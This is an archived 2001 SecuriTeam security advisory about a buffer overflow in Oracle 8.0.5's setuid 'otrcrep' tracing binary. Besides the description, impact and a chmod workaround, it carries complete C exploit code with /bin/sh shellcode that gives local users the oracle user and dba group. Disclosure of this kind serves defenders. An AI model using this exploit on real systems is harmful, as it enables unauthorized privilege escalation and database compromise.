[UNIX] Vulnerability in 'otrcrep' in Oracle ('a' Parameter)
From: support@securiteam.comDate: 08/12/01
- Previous message: support@securiteam.com: "[TOOL] Medusa DS9, a Security System Project"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [UNIX] Vulnerability in 'otrcrep' in Oracle ('a' Parameter) Message-Id: <20010812203427.EA888138BF@mail.der-keiler.de> Date: Sun, 12 Aug 2001 22:34:27 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Vulnerability in 'otrcrep' in Oracle ('a' Parameter)
------------------------------------------------------------------------
SUMMARY
Oracle's otrcrep, an oracle tracing program that provides formatting and
reporting options that let you present your collected data in a useful
way, contains a security vulnerability that allows local attackers to gain
elevated privileges.
DETAILS
Vulnerable systems:
Oracle version 8.0.5
There is a buffer overflow in otrcrep binary that can be use by local
users to obtain euid of the oracle user and egid to dba group.
Impact:
Any user with local access, can gain euid= oracle and compromise the
integrity of Database.
Temporary solution:
Remove the setuid bit from the program:
# chmod -s otrcrep
(NOTE: By removing the suid bit from oracle, any client connection
originated from non-oracle user will cause oracle to revert to TCP
connection instead of pipe. be prepared to a considerable performance
degrading if you choose this tactic.)
Vendor response:
Oracle has been notified and is investigating the potential security
vulnerability.
Exploit code:
/* cc -o evolut otrcrep.c; ./evolut 300 0 */
#include <stdio.h>
#include <stdlib.h>
#define BUFFER 300
#define OFFSET 0
#define NOP 0x90
#define BINARY "/home/oracle/app/oracle/product/8.0.5/bin/otrcrep a $EGG"
#define ORACLE_HOME "/home/oracle/app/oracle/product/8.0.5"
char shellcode[] =
"\xeb\x1d"
"\x5e"
"\x29\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\x89\x76\x08"
"\xb0\x0b"
"\x87\xf3"
"\x8d\x4b\x08"
"\x8d\x53\x0c"
"\xcd\x80"
"\x29\xc0"
"\x40"
"\xcd\x80"
"\xe8\xde\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
/* void main(int argc, char *argv[]) { */
void main() {
char *buff, *ptr,binary[120];
long *addr_ptr, addr;
int bsize=BUFFER;
int i,offset=OFFSET;
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() -1420 -offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
memset(buff,bsize/2,NOP);
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
setenv("ORACLE_HOME",ORACLE_HOME,1);
setenv("EGG",buff,1);
system(BINARY);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:pask@plazasite.com> Juan
Manuel Pascual Escriba and <mailto:sec@rony.clara.net> Ron Cohen.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[TOOL] Medusa DS9, a Security System Project"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
